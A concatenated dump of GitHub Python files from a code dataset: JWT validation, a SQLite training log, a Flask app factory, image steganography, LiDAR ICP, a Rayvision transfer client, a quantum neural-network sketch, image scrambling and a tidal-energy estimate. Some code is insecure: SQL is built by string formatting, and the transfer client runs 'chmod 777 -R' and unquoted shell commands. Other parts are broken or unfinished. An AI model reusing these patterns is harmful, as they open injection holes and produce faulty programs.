self.__jwt_keys_manager.get_public_key(team_name)\n return self.__validate(jwt_token, jwt_key)\n except JwtKeyNotFound as e:\n return JwtToken(False, error_message=str(e))\n","repo_name":"Aptoide/yajwt","sub_path":"yajwt/jwt_requests_validator.py","file_name":"jwt_requests_validator.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30794167044","text":"import sqlite3\nfrom typing import Optional\nfrom datetime import date\nfrom src.TrainingType import TrainingType\nfrom src.TrainingSession import TrainingSession\n\n\nclass 
HangboardSession(TrainingSession):\n edge_size: int\n performed_at: date\n num_sets: int\n set_hang_time: int\n user_id: int\n training_session_id: int\n\n def __init__(self,\n edge_size: int,\n num_sets: int,\n set_hang_time: int,\n user_id: int,\n performed_at: Optional[date] = date.today()):\n super().__init__(0.0, 'Home', TrainingType.HANGBOARD, user_id, performed_at)\n self.edge_size = edge_size\n self.num_sets = num_sets\n self.set_hang_time = set_hang_time\n self.user_id = user_id\n self.performed_at = performed_at\n\n def create(self):\n self.training_session_id = super().create()\n\n conn = sqlite3.connect('db/fullcrimp.db')\n c = conn.cursor()\n\n c.execute(\"\"\"\n INSERT INTO hangboard_sessions\n (edge_size, num_sets, set_hang_time, parent_id) VALUES\n ({0}, {1}, {2}, {3})\n \"\"\".format(self.edge_size, self.num_sets, self.set_hang_time, self.training_session_id))\n\n conn.commit()\n\n\n","repo_name":"Mystiking/FullCrimp","sub_path":"src/HangboardSession.py","file_name":"HangboardSession.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30535251769","text":"import os\n\nfrom dotenv import load_dotenv\nfrom flask import Flask\n\nfrom .handler import register_logging, register_errors, register_blueprints, \\\n register_commands, register_extensions, register_jinja_filters, \\\n register_tasks, register_token_bucket, register_socketio, register_shared_context\nfrom .settings import config\n\nDOT_ENV = os.path.join(os.path.dirname(os.path.dirname(__file__)), \".flaskenv\")\nload_dotenv(DOT_ENV, override=True)\n\n\ndef create_app():\n app = Flask(__name__, template_folder=\"templates\", static_folder=\"static\")\n app.config.from_object(config[os.environ[\"FLASK_ENV\"]])\n register_shared_context(app)\n register_jinja_filters(app)\n register_socketio(app)\n register_logging(app)\n register_extensions(app)\n register_blueprints(app)\n register_tasks(app)\n register_token_bucket(app)\n register_commands(app)\n register_errors(app)\n return app\n","repo_name":"firefirer1983/superdad","sub_path":"superdad/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18571503574","text":"# Python program implementing Image Steganography\n\n# PIL package allows modification of pixels in an image\nfrom PIL import Image\n\n# Convert encryption data into 8-bit binary\n# create characters using ascii from 8 bit binary provided through manipulation of pixels\ndef generateData(data):\n\n\t\t# creating a list of binary codes from\n\t\t# user inputed data, encrypted into image file\n\t\tnewData = []\n\n\t\tfor i in data:\n\t\t\tnewData.append(format(ord(i), '08b'))\n\t\treturn newData\n\n# Pixels are modified according to the 8 bit binary\n# data and returned as text when decrypted or simply stored in image file when encrypted\ndef modifyPixels(pixels, data):\n\n\tdatalist = generateData(data)\n\tlendata = len(datalist)\n\timageData = iter(pixels)\n\n\tfor i in range(lendata):\n\n\t\t# Extracting 3 pixels at a time 8th bit reads 1 or 0\n # 1 allows the file to keep being read 0 tells it to stop reading\n\t\tpixels = [value for value in imageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3]]\n\n\t\t# Pixel value is created\n\t\t# odd for 1 and even for 0\n\t\tfor j in range(0, 8):\n\t\t\tif (datalist[i][j] == '0' and 
pixels[j]% 2 != 0):\n\t\t\t\tpixels[j] -= 1\n\n\t\t\telif (datalist[i][j] == '1' and pixels[j] % 2 == 0):\n\t\t\t\tif(pixels[j] != 0):\n\t\t\t\t\tpixels[j] -= 1\n\t\t\t\telse:\n\t\t\t\t\tpixels[j] += 1\n\t\t\t\t\n\n\t\t# Eighth pixel of every set tells\n\t\t# whether to stop or read further.\n\t\t# 0 means keep reading; 1 means the\n\t\t# message is over.\n\t\tif (i == lendata - 1):\n\t\t\tif (pixels[-1] % 2 == 0):\n\t\t\t\tif(pixels[-1] != 0):\n\t\t\t\t\tpixels[-1] -= 1\n\t\t\t\telse:\n\t\t\t\t\tpixels[-1] += 1\n\n\t\telse:\n\t\t\tif (pixels[-1] % 2 != 0):\n\t\t\t\tpixels[-1] -= 1\n\n\t\tpixels = tuple(pixels)\n\t\tyield pixels[0:3]\n\t\tyield pixels[3:6]\n\t\tyield pixels[6:9]\n\ndef encrypt_enc(newImage, data):\n\tw = newImage.size[0]\n\t(x, y) = (0, 0)\n\n\tfor pixel in modifyPixels(newImage.getdata(), data):\n\n\t\t# Putting modified pixels in the new image\n\t\tnewImage.putpixel((x, y), pixel)\n\t\tif (x == w - 1):\n\t\t\tx = 0\n\t\t\ty += 1\n\t\telse:\n\t\t\tx += 1\n\n# Encode data into image\n# image first is opened\n# calls for user input to add secret message to be encrypted\n# if data is not added for encryption raise exception\n# generate new image with encrypted data\n# create new file with name and extension in working directory\n# new image saved with encrypted data \ndef encrypt():\n\timg = input(\"Enter image name including extension -> \")\n\timage = Image.open(img, 'r')\n\n\tdata = input(\"Enter your secret message : \")\n\tif (len(data) == 0):\n\t\traise ValueError('image empty try again')\n\n\tnewImage = image.copy()\n\tencrypt_enc(newImage, data)\n\n\tnewImageName = input(\"Type the name of encrypted image including extension : \")\n\tnewImage.save(newImageName, str(newImageName.split(\".\")[1].upper()))\n\n# Decode the data in the image\ndef decrypt():\n\timg = input(\"Type encrypted image including extension -> \")\n\timage = Image.open(img, 'r')\n\n\tdata = ''\n\timageData = iter(image.getdata())\n\n\twhile (True):\n\t\tpixels = [value for value in imageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3] +\n\t\t\t\t\t\t\t\timageData.__next__()[:3]]\n\n\t\t# recreating string of binary data. Going through the binary and reading \n # 8 bits at a time 0 for even 1 for odd and returning the associated ascii value\n\t\tbinaryString = ''\n\n\t\tfor i in pixels[:8]:\n\t\t\tif (i % 2 == 0):\n\t\t\t\tbinaryString += '0'\n\t\t\telse:\n\t\t\t\tbinaryString += '1'\n\n\t\tdata += chr(int(binaryString, 2))\n\t\tif (pixels[-1] % 2 != 0):\n\t\t\treturn data\n\n# Main function prompts user input to either call the encrypt or decrypt functions\n# catch error for invalid user inputs\ndef main():\n\ta = int(input(\"~~ Welcome to Image Encryption Tool ~~\\n\"\n\t\t\t\t\t\t\"1. Encrypt\\n2. 
Decrypt\\n\"))\n\tif (a == 1):\n\t\tencrypt()\n\n\telif (a == 2):\n\t\tprint(\"secret message : \" + decrypt())\n\telse:\n\t\traise Exception(\"Enter valid input\")\n\n# Driver\nif __name__ == '__main__' :\n\n\t# executing main function\n\tmain()\n","repo_name":"spentc4/Steganography-Final","sub_path":"curran_final_steganography.py","file_name":"curran_final_steganography.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25297703412","text":"import numpy as np\nimport open3d as o3d\nimport os\nfrom scipy.spatial.transform import Rotation as R\n\nfrom chimera_fgo.general import lla_to_ecef, ecef2enu\nfrom chimera_fgo.io import read_lidar_bin, read_gt\nfrom chimera_fgo.registration import initialize_source_and_target, p2pl_ICP_with_covariance\n\nif __name__=='__main__':\n # Load point clouds\n binpath = 'oak/stanford/groups/gracegao/kitti_raw/2011_09_30/2011_09_30_drive_0028_sync/velodyne_points/data'\n #binpath = os.path.join(os.getcwd(), '..', 'data', 'kitti', '2011_09_30_drive_0028_sync', 'velodyne_points', 'data')\n PC_data_all = read_lidar_bin(binpath)\n\n start_idx = 1550\n PC_data = PC_data_all[start_idx:]\n\n # Load ground truth\n gtpath = os.path.join(os.getcwd(), '..', 'data', 'kitti', '2011_09_30_drive_0028_sync', 'oxts', 'data')\n gt_data = read_gt(gtpath)\n gt_data = gt_data[start_idx:]\n lla = gt_data[:,:3] \n\n ref_lla = lla[0]\n ecef = lla_to_ecef(*lla[0])\n gt_ecef = np.zeros((len(lla),3))\n\n for i in range(len(lla)):\n ecef = lla_to_ecef(*lla[i])\n gt_ecef[i] = ecef2enu(ecef[0], ecef[1], ecef[2], ref_lla[0], ref_lla[1], ref_lla[2])\n\n gt_ecef = gt_ecef[:,[1,0,2]]\n\n # Get initial orientation\n heading = gt_data[0][5] # heading angle\n r = R.from_euler('XYZ', [0, 0, heading])\n R_heading = r.as_matrix()\n\n # Run ICP\n N = len(PC_data)\n #N = 1000\n R_abs = R_heading\n t_abs = gt_ecef[0].copy()\n poses = N * [None]\n poses[0] = (R_abs.copy(), t_abs.copy())\n\n lidar_Rs = []\n lidar_ts = []\n covariances = []\n\n for i in range(1,N):\n print(i, \"/\", N)\n trans_init = np.eye(4)\n threshold = 1\n source, target = initialize_source_and_target(PC_data[i], PC_data[i-1])\n reg_p2pl, covariance = p2pl_ICP_with_covariance(source, target, threshold, trans_init)\n R_hat = reg_p2pl.transformation[:3,:3]\n t_hat = reg_p2pl.transformation[:3,3]\n\n lidar_Rs.append(R_hat)\n lidar_ts.append(t_hat)\n covariances.append(covariance)\n\n","repo_name":"Stanford-NavLab/chimera_fgo","sub_path":"scripts/kitti_icp_sherlock.py","file_name":"kitti_icp_sherlock.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31134468101","text":"# -*- coding: utf-8 -*-\n\"\"\"Transfer Module.\n\nExecute the cmd command to make the last asset and\ndownload assets.\n\n\"\"\"\n\n# Import built-in modules\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\nimport sys\n\nfrom rayvision_sync.constants import ENGINE_TYPE, PLATFORM_ALIAS_MAP\nfrom rayvision_sync.exception import UnsupportedEngineType\n\n\nclass RayvisionTransfer(object):\n \"\"\"Transfer including upload files and download files.\"\"\"\n\n def __init__(self, api, config_bid, input_bid, domain, platform, local_os,\n user_id, automatic_line, output_bid=None, manage_task=None,\n transports_json=\"\", transmitter_exe=\"\", internet_provider=\"\",\n ):\n \"\"\"Initialize the configuration of the transfer.\n\n Args:\n 
config_bid (str): transport configuration id.\n input_bid (str): storage id.\n output_bid (str): storage id.\n domain (str): domain name, like task.renderbus.com\".\n platform (str): platform id, for example: \"2\".\n local_os (str): system name, Only support \"window\" or \"linux\".\n user_id (str): user accound id.\n manage_task (RayvisionManageTask, optional): Instantiated object\n of the management tasks, If it is just uploading, this\n parameter can not be passed. If it is downloaded, this\n parameter must have.\n internet_provider (str): Network provider.\n \"\"\"\n self.api = api\n\n self.config_bid = config_bid\n self.input_bid = input_bid\n self.output_bid = output_bid\n self.domain = domain\n self.platform = platform\n self.local_os = local_os\n self.user_id = user_id\n self.manage_task = manage_task\n self.transports_json = transports_json\n\n self.user_info = {\n 'config_bid': self.config_bid,\n 'input_bid': self.input_bid,\n 'output_bid': self.output_bid,\n 'user_id': self.user_id,\n 'domain': self.domain,\n 'platform': self.platform,\n 'local_os': self.local_os,\n }\n if os.path.exists(transmitter_exe):\n self.transmitter_exe = transmitter_exe\n else:\n self.transmitter_exe = self.init_transmitter()\n if automatic_line:\n self.transport_info = self.parse_service_transfe_line(internet_provider)\n else:\n self.transport_info = self.parse_transports_json(transports_json)\n\n def init_transmitter(self):\n \"\"\"Gets the path of the transfer software.\n\n Args:\n current_dir: transfer base directory.\n\n Returns: transfer software absolute path.\n\n \"\"\"\n current_dir = os.path.dirname(os.path.realpath(__file__))\n if self.local_os == 'windows':\n transmitter_exe = os.path.join(current_dir, 'transmission',\n 'windows',\n 'rayvision_transmitter.exe')\n else:\n transmitter_exe = os.path.join(current_dir, 'transmission',\n \"linux\",\n 'rayvision_transmitter')\n return transmitter_exe\n\n def parse_transports_json(self, transports_json=None, domain=None,\n platform=None):\n \"\"\"Analyze transports.json,obtain transfer server info.\n\n Extract the transmission configuration information of the\n corresponding platform in transports.json.\n\n Args:\n transports_json (str, optional): Path to transfer configuration\n files.\n domain (str, optional): Domain name.\n platform (str, optional): Platform number.\n\n Returns:\n dict: Transfer configuration information\n .e.g:\n {\n \"engine_type\":\"aspera\",\n \"server_name\":\"HKCT\",\n \"server_ip\":\"render-client.raysync.cn\",\n \"server_port\":\"10221\"\n }\n\n \"\"\"\n if not domain:\n domain = self.domain\n if not transports_json:\n current_dir = os.path.dirname(os.path.realpath(__file__))\n self.transports_json = os.path.join(current_dir, 'transmission',\n 'transports.json')\n if 'foxrenderfarm' in domain:\n key_first_half = 'foxrenderfarm'\n else:\n key_first_half = 'renderbus'\n\n if not platform:\n platform = self.platform\n key_second_half = self._get_key_second_half(platform)\n\n if key_second_half == 'default':\n key = key_second_half\n else:\n key = '%s_%s' % (key_first_half, key_second_half)\n\n with codecs.open(self.transports_json, 'r', 'utf-8') as f_transports:\n transports_info = json.load(f_transports)\n return transports_info[key]\n\n def parse_service_transfe_line(self, internet_provider=None):\n transfer_lines = self.api.transmit.get_transfer_config()\n if not transfer_lines:\n raise EnvironmentError(\"Unable to obtain transmission line\")\n resp_engine_lines = transfer_lines.get(\"resqEngines\")\n data = dict()\n for 
engine_info in resp_engine_lines:\n resp_line = engine_info[\"respTaskEngineLines\"]\n for line in resp_line:\n if internet_provider:\n if line[\"name\"] == internet_provider:\n data.update({\n engine_info[\"engineName\"].lower(): {\n \"server_name\": line[\"name\"],\n \"server_ip\": line[\"server\"],\n \"server_port\": line[\"port\"],\n }\n })\n break\n else:\n if line[\"isDefault\"]:\n data.update({\n engine_info[\"engineName\"].lower(): {\n \"server_name\": line[\"name\"],\n \"server_ip\": line[\"server\"],\n \"server_port\": line[\"port\"],\n }\n })\n break\n return data\n\n @staticmethod\n def _get_key_second_half(platform):\n \"\"\"Get the key corresponding to the platform number.\n\n Returns:\n key_second_half(str): Representative submits tasks to several\n platforms.\n\n \"\"\"\n return PLATFORM_ALIAS_MAP[platform]\n\n\n def create_cmd(self, cmd_params, db_ini_path=None, engine_type=\"aspera\", server_ip=None, server_port=None,\n main_user_id=None, main_input_bid=None, network_mode=0):\n \"\"\"Splice a cmd command.\n\n Args:\n cmd_params (list): Parameters required by the cmd command.\n Examples::\n\n [\n transmit_type, # Transmission type\n local_path, # Local file path\n output_file_name, # File path uploaded to the server\n max_speed, # Maximum transfer speed of upload\n 'true', # Whether to save the path\n 'output_bid', # Transfer id\n ]\n\n db_ini_path (str): Database path.\n engine_type (str, optional): set engine type, support \"aspera\" and \"raysync\", Default \"aspera\".\n server_ip (str, optional): transmit server host,\n if not set, it is obtained from the default transport profile.\n server_port (str, optional): transmit server port,\n if not set, it is obtained from the default transport profile.\n main_user_id (str): Main account user id.\n main_input_bid (str): Main account input bid.\n network_mode (int): network mode: 0: auto selected, default;\n 1: tcp;\n 2: udp;\n\n Returns:\n str: Cmd command.\n\n \"\"\"\n if not sys.platform.startswith('win'):\n os.environ[\"LD_LIBRARY_PATH\"] = os.path.dirname(self.transmitter_exe)\n chmod_str = \"chmod 777 -R {}/*\".format(os.path.dirname(self.transmitter_exe))\n os.system(chmod_str)\n if not bool(engine_type):\n engine_type = \"aspera\"\n if engine_type not in ENGINE_TYPE:\n msg = \"{} is not a supported transport engine, \" \\\n \"currently only support 'aspera' and 'raysync'\".format(engine_type)\n raise UnsupportedEngineType(msg)\n transmit_cmd = ('echo y|\"{exePath}\" -E \"{engineType}\"'\n ' -H \"{serverIp}\" -P \"{serverPort}\" -S \"{download_id}\"'\n ' -U \"{userId}\" -T \"{transmit_type}\" -L \"{local_path}\"'\n ' -R \"{server_path}\" -r \"{maxConnectFailureCount}\"'\n ' -K \"{keep_path}\" -s \"{max_speed}\" -C \"{database_config_path}\" -p {network_mode}'\n ' ').format(\n exePath=self.transmitter_exe,\n engineType=engine_type,\n serverIp=server_ip if server_ip else self.transport_info[engine_type]['server_ip'],\n serverPort=server_port if server_port else self.transport_info[engine_type]['server_port'],\n download_id=main_input_bid if main_input_bid else self.user_info[cmd_params[5]],\n userId=main_user_id if main_user_id else self.user_id,\n transmit_type=cmd_params[0],\n local_path=cmd_params[1],\n server_path=cmd_params[2],\n maxConnectFailureCount='2', # default is 2.\n keep_path=cmd_params[4],\n max_speed=cmd_params[3],\n database_config_path=db_ini_path,\n network_mode=int(network_mode))\n return 
transmit_cmd\n","repo_name":"renderbus/rayvision_sync","sub_path":"rayvision_sync/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6131181629","text":"\nimport numpy as np\nfrom qiskit import Aer\nfrom qiskit.circuit import QuantumCircuit, QuantumRegister, ClassicalRegister\nfrom qiskit.extensions import HamiltonianGate\n# Quantum Deep Neural Network Layer\nclass QDNNL():\n def __init__(self, num_qubits, D_epsilon, D_gamma, hamiltonians=[np.eye(4)]):\n self.num_qubits = num_qubits\n self.D_epsilon = D_epsilon\n self.D_gamma = D_gamma\n self.hamiltonians = [HamiltonianGate(h, 1) for h in hamiltonians]\n # inputs from most recent forward propogation\n self.inputs = None\n # parameters to encoder, stored as one dimensional vector\n # size will be: num_qubits *(2 + self.D_epsilon * 3)\n self.encoder_parameters = list()\n # parameters of transformer circuit, stored as one dimensional vector\n # size will be: num_qubits *(self.D_gamma * 3 + 2)\n self.transformer_parameters = list()\n # initialize quantum objects\n self.circuit : QuantumCircuit= QuantumCircuit(QuantumRegister(num_qubits), ClassicalRegister(num_qubits))\n self.backend = Aer.get_backend('statevector_simulator')\n # append encoder to circuit\n self.circuit = self.circuit.compose(self.build_encoder(),range(self.num_qubits))\n # append transformer to circuit\n self.circuit = self.circuit.compose(self.build_transformer(),range(self.num_qubits))\n # create all output circuits\n self.complete_circuits = list()\n for hamiltonian in self.hamiltonians:\n self.complete_circuits.append(self.circuit.compose(self.build_measurement(hamiltonian), range(self.num_qubits)))\n \n \n def build_ent(self):\n ent = QuantumCircuit(self.num_qubits)\n for qubit in range(1, self.num_qubits):\n ent.cx(qubit-1, qubit)\n ent.cx(self.num_qubits - 1, 0)\n return ent.to_instruction(label=\"Ent\")\n \n \n \"\"\"\n create encoder circuit\n :param De: an integer that indicates how many times a part of this circuit is repeated\n :return: encoder quantum circuit\n :rtype: Instruction\n \"\"\"\n def build_encoder(self):\n encoder = QuantumCircuit(self.num_qubits)\n \n encoder.x(range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.barrier(range(self.num_qubits))\n for _ in range(self.D_epsilon):\n encoder = encoder.compose(self.build_ent(), range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.x(range(self.num_qubits))\n encoder.z(range(self.num_qubits))\n encoder.barrier(range(self.num_qubits))\n \n return encoder.to_instruction(label=\"encoder|D_E={}\".format(self.D_epsilon))\n \n def build_transformer(self):\n transformer = QuantumCircuit(self.num_qubits)\n \n for _ in range(self.D_gamma):\n transformer = transformer.compose(self.build_ent(), range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n transformer.x(range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n transformer.barrier(range(self.num_qubits))\n \n transformer.x(range(self.num_qubits))\n transformer.z(range(self.num_qubits))\n \n return transformer.to_instruction(label=\"transformer|D_Gamma={}\".format(self.D_gamma))\n \n def build_measurement(self, hamiltonian):\n measurement = QuantumCircuit(self.num_qubits)\n measurement = measurement.compose(hamiltonian)\n measurement.measure_all()\n return measurement.to_instruction(label=\"measurement\")\n \n def forward(self, input):\n # check that all input values are 
zeros or ones\n for i0, i1 in zip((input > 1), input < 0):\n assert i0 == False and i1 == False\n # initialize the state of the qubits in the encoder\n self.circuit.initialize(input)\n # execute job on simulator for each complete circuit\n results = list()\n for complete_circuit in self.complete_circuits:\n results.append(self.backend.run(complete_circuit, shots=100).result())\n for result in results:\n print(result)\n \n def calculate_circuit_loss(self, vector):\n deltas = np.zeros(len(vector))\n # iterate through parameters in encoder\n for i in range(len(vector)):\n vector[i] += np.pi / 2\n h_plus = self.forward(self.inputs)\n vector[i] -= np.pi\n h_minus = self.forward(self.inputs)\n deltas[i] = (h_plus - h_minus) / 2.0\n return deltas\n \n def backpropogate_error(self, loss):\n # calculate output loss w.r.t. input\n encoder_deltas = self.calculate_circuit_loss(self.encoder_parameters)\n # iterate thorugh inputs, assign gradient for each\n transformer_deltas = self.calculate_circuit_loss(self.transformer_parameters)\n # loss with respect to inputs\n loss_inputs = loss * encoder_deltas\n # loss with respect to parameters\n loss_parameters = loss * transformer_deltas\n return loss_inputs, loss_parameters\n \nclass InputLayer(QDNNL):\n def __init__(self, num_qubits, D_epsilon, D_gamma):\n super().__init__(num_qubits, D_epsilon, D_gamma)\n # prepare quantum circuit\n self.input_layer = QuantumCircuit(QuantumRegister(num_qubits), ClassicalRegister(num_qubits))\n # add encoder circuit to layer\n self.input_layer = self.input_layer.compose(self.build_encoder(),range(self.num_qubits))\n self.input_layer = self.input_layer.compose(self.build_transformer(),range(self.num_qubits))\n \n\n\nclass QDNN():\n \n def __init__(self) -> None:\n # fixed theta used in encoding circuits\n self.theta = np.pi / 4\n pass\n \n def calculate_loss(self, output, target, type=\"MSE\"):\n if type == \"MSE\":\n return np.sum(((output - target) ** 2))/len(output)","repo_name":"DRosen766/NeuralNets","sub_path":"QDNN.py","file_name":"QDNN.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19219449436","text":"print(\"start\")\nimport numpy as np\nimport cv2\nimport os\nimport random\nimport math\nimport copy\nimport os\n\ndef sol(enc_pic,dec_pic,output_txt):\n answer2=[]\n source_img = cv2.imread(enc_pic)\n #answer = [[0 for j in range(N)] for i in range(M)]\n M=len(source_img)\n N=len(source_img[0])\n\n K=24\n if len(source_img.shape) == 2:\n K=8\n print(M,N,K)\n bz=24\n rz=12\n cz=int((rz*M)/math.gcd(M,N))\n bx=25\n rx=16\n cx=int((rx*M)/math.gcd(M,K))\n by=27\n ry=18\n cy=int((ry*N)/math.gcd(K,N))\n iter_num=5\n answer2=copy.deepcopy(source_img)\n Sz_inverse_matric=[[1,-bz,0],[-cz,1,0],[0,0,1]]\n Sx_inverse_matric=[[1,0,0],[0,1,-bx],[0,-cx,1]]\n Sy_inverse_matric=[[1,0,-cy],[0,1,0],[-by,0,1]]\n print(Sz_inverse_matric)\n print(Sx_inverse_matric)\n print(Sy_inverse_matric)\n for i in range(M):\n ori=i\n for j in range(N):\n orj=j\n output=[i,j,48]\n \n for i in range(iter_num):\n #print(width)\n output = np.dot(Sy_inverse_matric, output)\n \n output[0]=output[0]%N\n output[1]=output[1]\n output[2]=output[2]%K\n \n output = np.dot(Sx_inverse_matric, output)\n output[0]=output[0] \n output[1]=output[1]%M\n output[2]=output[2]%K\n\n output = np.dot(Sz_inverse_matric, output)\n output[0]=output[0]%N\n output[1]=output[1]%M\n output[2]=output[2]\n #k=input()\n answer2[output[1]][output[0]]=source_img[ori][orj] \n 
answer2=np.array(answer2) \n cv2.imwrite(dec_pic,answer2)\n\n \"\"\"\n f = open(output_txt, 'w')\n f.write(\"N =\"+str(N) +\"\\n\")\n f.write(\"M =\"+str(M) +\"\\n\")\n f.write(\"gcd(M,N) =\"+str(math.gcd(M,N)) +\"\\n\")\n f.write(\"gcd(M,K) =\"+str(math.gcd(M,K)) +\"\\n\")\n f.write(\"gcd(K,N) =\"+str(math.gcd(K,N)) +\"\\n\")\n f.write(\"bx =\"+str(bx) +\"\\n\")\n f.write(\"by =\"+str(by) +\"\\n\")\n f.write(\"bz =\"+str(bz) +\"\\n\")\n f.write(\"rx =\"+str(rx) +\"\\n\")\n f.write(\"ry =\"+str(ry) +\"\\n\")\n f.write(\"rz =\"+str(rz) +\"\\n\")\n f.write(\"cx =\"+str(cx) +\"\\n\")\n f.write(\"cy =\"+str(cy) +\"\\n\")\n f.write(\"cz =\"+str(cz) +\"\\n\")\"\"\"\n print(\"finish decrypt\")\nif __name__ == \"__main__\":\n #sol2(\"./source/kodim04.png\",\"./encryp/kodim04.png\",\"./decryp/kodim04.png\")\n #sol2(\"./source/Boat.png\",\"./encryp/Boat.png\",\"./decryp/Boat.png\")\n source_path = \"./source/\"\n enc_path = \"./encryp\"\n dec_path = \"./decryp\"\n dirs = os.listdir( enc_path )\n for i in dirs:\n sol(\"./encryp/\"+i,\"./decryp/\"+i,\"./parame/\"+i[:-3]+\"txt\")\n #source_img = cv2.imread(\"./source/kodim04.png\")","repo_name":"leonardo-lin/color-transformer","sub_path":"hw12/7111056081-06-3D-NEAT_dec.py","file_name":"7111056081-06-3D-NEAT_dec.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38475534585","text":"\"\"\"\nCreated on Tue Oct 27 12:23:22 2020\n\n@author: jeff\n\"\"\"\n\n# This script contains calculations pertaining to possibilities of\n# installation for tidal energy infrastructure in Northeastern region of the\n# United States. It includes potential power-production and economic analyses.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nrho = 1000 # density of water [kg/m^3]\ng = 9.81 # acceleration due to gravity [m/s^2]\n\nA = 10 # area of interest, [mi^2]\nA = A*5280**2/3.281**2 # [mi^2] -> [ft^2] -> [m^2]\n\n# tidal range info\n # https://upload.wikimedia.org/wikipedia/commons/5/5e/M2_tidal_constituent.jpg\nz0 = 100 # tidal range [cm]\nz0 = z0/100 # [cm] -> [m]\nt_T = 6.2 # time period between hi & lo tide [hrs] NOTE: _T refers to natural Tidal cycle\nt_T = t_T*60**2 # [hrs] -> [s]\n\n# define geometry of system\n# assuming small vertical hole\n# https://www.engineeringtoolbox.com/flow-liquid-water-tank-d_1753.html\n# h1 = H, h2 = h (in figure)\nl = 1 # length of hole [m]\nh = 0.6 # height of hole [m]\nA = h*l # hole area [m^2]\nh1 = z0 - h/2 # height between center of hole and top of water\nh2 = h/2 # height between center of hole and floor\nh_checc_is_z = h1+h2\n\n## P0 = rho*g*z # calculate hydrostatic pressure at lo tide due to difference in height [N/m^2]\n#V = A*z0 # volume of water [m^3]\n#m = rho*V # mass of water [kg]\n#pe = m*g*z0 # potential energy of water [J]\n#P = pe/t_T # very, very rough estimate of power produced during one tide [J/s] [W]\n#P = P/1000**2 # [W] -> [MW]\n\n#Cv = 0.97 # velocity coeff\n#Cd = 1 # discharge coeff\n\n#v = Cv*(2*g*h1)**0.5 # outlet velocity of water [m/s]\n#dV_dt = Cd*A*(2*g*h1)**0.5 # volume flow rate [m^3/s]\n#F = rho*dV_dt*v # reaction force\n\n# generate diagram\nx = [0,0,1,1]\ny = [0,z0,0,z0]\nplt.plot(x,y,'ro')\nplt.plot(x[1],h,'co')\nplt.plot(x[1],0,'co')\nplt.title('Diagram')\nplt.xlabel('(arbitrary length scale)')\nplt.ylabel('Height [m]')\nplt.show()\n\n\n# time begins at hi tide\ndt = 120 # time increment [s]\nsteps = t_T/dt # number of time steps\nsteps = int(steps) # convert from type float to 
integer\ndz_dt_T = z0/t_T # rate of change in tide over time [m/s]\n\nt = [0]\nz = [z0]\nz_T = [z0]\nV = [A*z0]\nm = [rho*A*z0] # m = rho*V\npe = [rho*A*z0*g*z0] # pe = m*g*z0\nP = [pe[0]/dt/1000**2] # [MW]; pe is a list, so index its first element before dividing\n\n\nfor i in range(steps):\n    t.append(dt*(i+1)) # t[0] = 0 is already in the list\n    # assumed completion of the unfinished original line: linear fall from hi tide\n    z_T.append(z0 - dz_dt_T*t[-1])\n","repo_name":"JiffiPop/PYTHON--Side-Projects","sub_path":"Tidal Energy Trade Study/study_1_time_step.py","file_name":"study_1_time_step.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23122539820","text":"import stat\nimport shutil\nfrom xml.etree import ElementTree\nfrom tegrasign_v3_util import *\n\ndef compute_sha(type, filename, offset, length, blockSize=\"0\"):\n    if type == 'sha256':\n        return do_sha((256/8), filename, offset, length, blockSize)\n    else:\n        return do_sha((512/8), filename, offset, length, blockSize)\n\n'''\nPerform a SHA digest based on the node definition.\n'''\ndef perform_sha(filename, shanode):\n    if (shanode == None):\n        return\n    sha_type = shanode.get('digest_type')\n    dest_file = shanode.get('digest_file')\n    length = int (shanode.get('length') if shanode.get('length') else 0)\n    offset = int (shanode.get('offset') if shanode.get('offset') else 0)\n\n    compute_sha(sha_type, filename, offset, length)\n    if not os.path.isfile(dest_file):\n        raise tegrasign_exception('Could not find ' + dest_file)\n\n'''\nThis parses the xml to sign a list of specified files\nExample xml file format (reconstructed from the attributes parsed below; the\noriginal example was lost to markup stripping):\n\n    <file name=\"file.bin\" offset=\"0\" length=\"0\" key_index=\"0\">\n        <sbk encrypt=\"1\" sign=\"1\" encrypt_file=\"file_encrypt.bin\" hash=\"file.hash\"/>\n        <sha digest_type=\"sha256\" digest_file=\"file.sha\"/>\n    </file>\n\n'''\ndef sign_files_internal(p_keylist, filenode, pkh, mont, sha_type, iv):\n\n    filename = filenode.get('name')\n    if filename == None:\n        info_print('***Missing file name*** ')\n        return exit_routine()\n\n    sign_fh = open_file(filename, 'rb')\n    buff_data = sign_fh.read()\n    file_size = len(buff_data)\n    sign_fh.close()\n\n    length = int (filenode.get('length') if filenode.get('length') else 0)\n    offset = int (filenode.get('offset') if filenode.get('offset') else 0)\n    key_index = int (filenode.get('key_index') if filenode.get('key_index') else 0)\n\n    length = length if length > 0 else 